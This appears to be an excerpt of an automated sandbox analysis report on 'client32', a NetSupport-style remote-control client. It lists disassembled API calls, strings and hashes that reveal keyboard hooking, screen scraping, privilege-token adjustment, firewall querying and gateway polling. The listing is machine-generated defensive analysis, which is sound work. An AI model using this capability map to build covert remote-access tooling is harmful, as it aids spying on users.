                                                                                                                                        Strings
                                                                                                                                        • *TcpNoDelay, xrefs: 688FABB8
                                                                                                                                        • Connect error to %s using hijacked socket, error %d, xrefs: 688FAB17
                                                                                                                                        • Cannot connect to gateway %s via web proxy, error %d, xrefs: 688FAD14
                                                                                                                                        • Cannot connect to gateway %s, error %d, xrefs: 688FACA6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                                                        • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                                        • API String ID: 692187944-2561115898
                                                                                                                                        • Opcode ID: 236334495597b7b7824bf2c753d37ee01193a38125fd26e185cc1d420e41b778
                                                                                                                                        • Instruction ID: ce5c5e15d9978a25e8b83696e03547251ddcda56d6bc5fd5b062f68c347c3aa8
                                                                                                                                        • Opcode Fuzzy Hash: 236334495597b7b7824bf2c753d37ee01193a38125fd26e185cc1d420e41b778
                                                                                                                                        • Instruction Fuzzy Hash: 71E1C575A08219AFDB20DF98D840BEDB3B5FF89354F8045AAE91EA7280D7309E45CB51
                                                                                                                                        APIs
                                                                                                                                        • #16.WSOCK32(00000000,009686C7,68903361,00000000,00000000,68903361,00000007), ref: 688F924C
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000,009686C7,68903361,00000000,00000000,68903361,00000007), ref: 688F925B
                                                                                                                                        • GetTickCount.KERNEL32 ref: 688F9274
                                                                                                                                        • Sleep.KERNEL32(00000001,00000000,009686C7,68903361,00000000,00000000,68903361,00000007), ref: 688F92A8
                                                                                                                                        • GetTickCount.KERNEL32 ref: 688F92B0
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 688F92BC
                                                                                                                                        Strings
                                                                                                                                        • ReadSocket - Error %d reading response, xrefs: 688F92F7
                                                                                                                                        • ReadSocket - Connection has been closed by peer, xrefs: 688F92E0
                                                                                                                                        • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 688F922B
                                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 688F9226
                                                                                                                                        • ReadSocket - Would block, xrefs: 688F928A
                                                                                                                                        • *RecvTimeout, xrefs: 688F927B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountSleepTick$ErrorLast
                                                                                                                                        • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                                                        • API String ID: 2495545493-2497412063
                                                                                                                                        • Opcode ID: 52f58ba7c3d379e99dba053499f6df84b9518cb1548c503282d17e6a6a5e921d
                                                                                                                                        • Instruction ID: 57eb3688a52f565b4a42e078e35e0421f5974f955e23d945f67aa12c84314776
                                                                                                                                        • Opcode Fuzzy Hash: 52f58ba7c3d379e99dba053499f6df84b9518cb1548c503282d17e6a6a5e921d
                                                                                                                                        • Instruction Fuzzy Hash: 9531CE39E44208AFDB10DFB8EC84B9EB7F4EB85364F804869F928D7540E731E9418B91
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTime.KERNEL32(?,?,?,976C354D,27CEFB69,976C34B3,FFFFFFFF,00000000), ref: 689031E2
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6892ECB0), ref: 689031EC
                                                                                                                                        • GetSystemTime.KERNEL32(?,27CEFB69,976C34B3,FFFFFFFF,00000000), ref: 6890322A
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6892ECB0), ref: 68903234
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,976C354D), ref: 689032BE
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 689032D3
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6890334D
                                                                                                                                          • Part of subcall function 6890BA20: __strdup.LIBCMT ref: 6890BA3A
                                                                                                                                          • Part of subcall function 6890BB00: _free.LIBCMT ref: 6890BB2D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                                                        • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                                                        • API String ID: 1510130979-3441452530
                                                                                                                                        • Opcode ID: 3a254c53c8c2cdb703ed1f6dd0b20b64d3ee421feee68701123ba3bbf3b5737d
                                                                                                                                        • Instruction ID: 5503bcffd3ab91c1c5c7e3103be27a87120857bdd3dee7127c21bc812eba8142
                                                                                                                                        • Opcode Fuzzy Hash: 3a254c53c8c2cdb703ed1f6dd0b20b64d3ee421feee68701123ba3bbf3b5737d
                                                                                                                                        • Instruction Fuzzy Hash: DD613D76904618AFCB14DFA8D884EEEB7B9FB49314F80851DE516A7240EB74E504CBA1
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                                        • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                                        • CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                                        • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                                        • API String ID: 3222248624-258972079
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                                                        • API String ID: 2102423945-35127696
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(1102DF30,?,00000000), ref: 11030B34
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                                        • API String ID: 3192549508-611217420
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,7622F550,?,00000000), ref: 1109DC58
                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                                        • EqualSid.ADVAPI32(?,004B11D8,?,00000001,00000001), ref: 1109DCB3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationToken$AllocateEqualInitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1878589025-0
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,A0A8B03E,00080000,00000000,00000000), ref: 1109C77D
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2349140579-0
                                                                                                                                        APIs
                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109DB20,00000244,cant create events), ref: 1109C7FC
                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,1109DB20,00000244,cant create events), ref: 1109C805
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                        • Opcode ID: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
                                                                                                                                        • Instruction ID: 2330733e60bf6a127bb8479b673e73a50ba3166191bfb56ce9f8e109ae2e049c
                                                                                                                                        • Opcode Fuzzy Hash: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
                                                                                                                                        • Instruction Fuzzy Hash: 09E0EC71A00611ABE738CE249D95FA777ECAF08B11F21496DF956E6180CAA0E8448B64
                                                                                                                                        APIs
                                                                                                                                        • GetSystemMetrics.USER32(00002000), ref: 1102E234
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E266
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateEventMetricsSystem
                                                                                                                                        • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$305090$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$RWh$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.4$V12.10.4$View$WPh$WRh$WRh$Windows 95$Windows Ding.wav$Windows XP Ding.wav$_debug$_debug$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaUI$jj$jj$jjjj$pcicl32$t&h$u.j$win8ui$|#j$\$s$|
                                                                                                                                        • API String ID: 1866202007-3774753590
                                                                                                                                        • Opcode ID: 408c2fe09a5f6513f0d4732c7edee4b67311bb803a75e32f8b7f7cef0c5b0f00
                                                                                                                                        • Instruction ID: b300946befec89326bcf45d0e3de5fe608372e51a41b6fb818d772ce7a29db62
                                                                                                                                        • Opcode Fuzzy Hash: 408c2fe09a5f6513f0d4732c7edee4b67311bb803a75e32f8b7f7cef0c5b0f00
                                                                                                                                        • Instruction Fuzzy Hash: F7B2FC74F4122A6BEB11DBE58C45FEDF7966B4470CF9040A8EA197B2C4FBB06940CB52

                                                                                                                                        Control-flow Graph

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memsetwsprintf
                                                                                                                                        • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$30/10/15 13:45:13 V12.10F4$305090$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                        • API String ID: 1984265443-3756774750
                                                                                                                                        • Opcode ID: 38c7c6f243f953fd73c3e761b2ebc1a9b74cfbed7768dff45ff639fbb013f980
                                                                                                                                        • Instruction ID: 4fcf39a05b1f5517457e0201ca3c447b40b49c63e9df5c66bfbc6ef5231c6bdf
                                                                                                                                        • Opcode Fuzzy Hash: 38c7c6f243f953fd73c3e761b2ebc1a9b74cfbed7768dff45ff639fbb013f980
                                                                                                                                        • Instruction Fuzzy Hash: D632B375D0026A9FDB12DFA4CC90BEDB7B9BB44308F8045E9E559A7240EB706E84CF61

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: *Dept$*Gsk$1.1$305090$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                                        • API String ID: 2102423945-3026469383
                                                                                                                                        • Opcode ID: 92e0bb62de04f40c2618eb65855ad82071d4c9ad0304a6da1c0bbfd7fab52d9b
                                                                                                                                        • Instruction ID: 52b20725f5a3ddb827dfdcaef008150e5c0a94fee5ea769f9b7411efc7f2b807
                                                                                                                                        • Opcode Fuzzy Hash: 92e0bb62de04f40c2618eb65855ad82071d4c9ad0304a6da1c0bbfd7fab52d9b
                                                                                                                                        • Instruction Fuzzy Hash: FFE17076D4062C7BCB20DBA88C80FFF77789F99619F8045D9E51962141EB319B848FE1

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,8504C483,762323A0), ref: 1113FC13
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 1113FC5C
                                                                                                                                        • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 1113FC75
                                                                                                                                        • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 1113FC84
                                                                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 1113FC8A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113FC9E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1113FCBD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 1113FCC8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 1113FCD3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1113FCDE
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 1113FCE9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 1113FCF4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1113FCFF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1113FD0A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 1113FD15
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 1113FD20
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1113FD2B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 1113FD36
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 1113FD41
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 1113FD4C
                                                                                                                                          • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                                                        • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113DB64
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 1113DB73
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 1113DB85
                                                                                                                                        • LoadLibraryA.KERNEL32(imm32,?,?,00000002,00000000), ref: 1113DBC4
                                                                                                                                        • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 1113DC29
                                                                                                                                        • _memset.LIBCMT ref: 1113DC3D
                                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 1113DC8F
                                                                                                                                        • GetStockObject.GDI32(00000000), ref: 1113DC9A
                                                                                                                                        • LoadLibraryA.KERNEL32(pcihooks,?,?,00000002,00000000), ref: 1113DD52
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 1113DD67
                                                                                                                                        • RegisterClassExA.USER32(?), ref: 1113DCB5
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • SetTimer.USER32(00000000,00000000,000003E8,11139470), ref: 1113DE94
                                                                                                                                        • #17.COMCTL32(?,?,?,00000002,00000000), ref: 1113DEC9
                                                                                                                                        • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000002,00000000), ref: 1113DED4
                                                                                                                                          • Part of subcall function 11015E10: LoadLibraryA.KERNEL32(User32.dll), ref: 11015E18
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
                                                                                                                                        • String ID: *DisableDPIAware$*quiet$Client$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,?,?,?,?,00000100), ref: 1102D9E1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: $30/10/15 13:45:13 V12.10F4$305090$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                                        • API String ID: 1029625771-1136126593
                                                                                                                                        • Opcode ID: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
                                                                                                                                        • Instruction ID: 3410179eeb5a9037d1fa1f4c8bb60b9922e488a50ebb30bdceadca7c29897b10
                                                                                                                                        • Opcode Fuzzy Hash: 4c6442ae546d6c34c6e669bc9b0d3f2b7a72132ce3f96623498d00e912fca378
                                                                                                                                        • Instruction Fuzzy Hash: 03C1C375E0026A9FDB22DF948C90BEDF7B9BB44308F9044EDE559A7240E7706E80CB61

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000000,?,00000000,?,688FD77B,00000000), ref: 688F63E8
                                                                                                                                        • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 688F63FA
                                                                                                                                        • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,688FD77B,00000000), ref: 688F6412
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F643B
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,688FD77B,00000000), ref: 688F6450
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F646F
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,688FD77B,00000000), ref: 688F6484
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F64A3
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,688FD77B,00000000), ref: 688F64C5
                                                                                                                                        • shutdown.WSOCK32(?,00000001,?,00000000,?,688FD77B,00000000), ref: 688F64E9
                                                                                                                                        • GetLastError.KERNEL32(?,00000001,?,00000000,?,688FD77B,00000000), ref: 688F64F2
                                                                                                                                        • timeGetTime.WINMM(?,00000001,?,00000000,?,688FD77B,00000000), ref: 688F6510
                                                                                                                                        • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F6526
                                                                                                                                        • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F6533
                                                                                                                                        • timeGetTime.WINMM(?,00000000,?,688FD77B,00000000), ref: 688F6540
                                                                                                                                        • Sleep.KERNEL32(00000001,?,00000000,?,688FD77B,00000000), ref: 688F654B
                                                                                                                                        • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F6563
                                                                                                                                        • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,688FD77B,00000000), ref: 688F6574
